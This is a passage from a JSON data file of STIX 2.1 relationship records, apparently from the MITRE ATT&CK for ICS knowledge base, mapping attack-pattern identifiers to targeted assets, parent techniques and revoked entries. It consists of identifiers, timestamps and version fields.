"spec_version": "2.1", + "id": "relationship--82ef737f-8ec9-4bd9-9395-f3caf87ce3d9", + "created": "2024-06-26T11:55:45.094Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:55:45.094Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82f35485-e0de-4eb5-b643-e5608bfdcd94", + "created": "2020-10-02T16:40:47.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82feba8a-2d87-4dbb-a4c1-90dc6413bd09", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--830006c6-3ea6-4680-a8f5-42fad83d5433", + "created": "2020-03-17T13:03:26.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", + "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8303449e-8cf2-4690-8985-333bc0d3fd13", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8311f587-a597-45b9-b184-699d9ea6a12c", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8312ef51-2dea-4019-a993-a4c7a06f8e40", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--834f74a0-0684-463d-9e97-7d5aeb3e9265", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--83540a4e-9f12-4792-a541-910bb8fd0fe4", + "created": "2020-03-02T19:05:18.286Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8379d194-2445-4057-ba1e-575d57ed305b", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--838cdce0-9296-44eb-b27d-bce72fe8245e", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8399c60f-6fd5-4060-9e5b-6661718a131a", + "created": "2024-05-23T04:05:33.991Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:49:52.006Z", + "description": "Asset Mapping Rationale: Detection - Monitor and analyze traffic patterns and packet inspection associated to protocols that do not follow the expected protocol standards and traffic flows.", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--83a964cb-730c-44e4-859b-b5246159396b", + "created": "2023-09-29T17:59:43.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:59:43.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--83d6d242-4370-4c62-b295-5c1f499000f5", + "created": "2024-06-27T08:50:04.242Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:50:04.242Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--83ea0d95-ccee-4f62-bf7f-bfca81a41c5b", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--83f8f60d-1825-43d3-8a88-c89bc4b85d7a", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84002df8-4ac4-40ea-be23-6f7cdb859397", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--843c53bc-daa4-4d02-9d30-50f950b2f813", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84400340-7144-4896-8bf6-fd683970324b", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--844a7c42-0d65-4e10-b438-e7aad091e443", + "created": "2020-02-12T18:56:59.293Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b", + "target_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84671396-a556-4a5d-9bb9-cac697277371", + "created": "2023-09-29T16:31:12.255Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:31:12.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8474e6ef-39c4-4ecc-ba5a-cbd9b32b5c65", + "created": "2023-09-28T21:11:15.610Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:11:15.610Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--847b5ffb-77a2-4892-9e96-2b454a2c3f22", + "created": "2020-12-17T15:24:12.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8489ae47-1c92-4d56-9dae-0f7e95ab9e8b", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8490763f-672b-4a8e-afbe-ad6d7f7b285d", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8492b88d-0563-4ecc-950f-952feb6b8c27", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84a31d50-5ea9-4a16-b43f-ee1821109d42", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84cc41e8-dad5-4646-9506-81c734652425", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84d7f0d2-5c7a-43f4-a3a9-62162e997b34", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84dedb05-1eb9-4274-a1c7-4902a86ca956", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84f245b0-8608-4040-a2ed-402e2114fd5e", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84fa50ff-bb84-4ab6-b759-658c57532c42", + "created": "2023-09-29T16:32:09.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:32:09.319Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84fbed30-0b96-4cab-bc25-1f54d9da2b8f", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84fc66a4-eb4d-4c8d-a781-42650ba1ff2a", + "created": "2024-06-26T15:02:36.836Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:02:36.836Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--84fd1e14-44a8-4eac-9bfc-67b50ea1acf7", + "created": "2023-09-29T18:01:32.878Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:01:32.878Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8504dacb-c7d7-492d-975d-dcda9ca8b836", + "created": "2024-06-26T13:52:45.726Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:52:45.726Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8510e049-72c3-4653-aeb3-a9444730f95b", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8530c1ea-fe9f-4b04-be34-7404d5e30e75", + "created": "2023-09-29T17:59:22.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:59:22.291Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--853fa6ae-4c7c-4297-88e7-17305157b722", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": 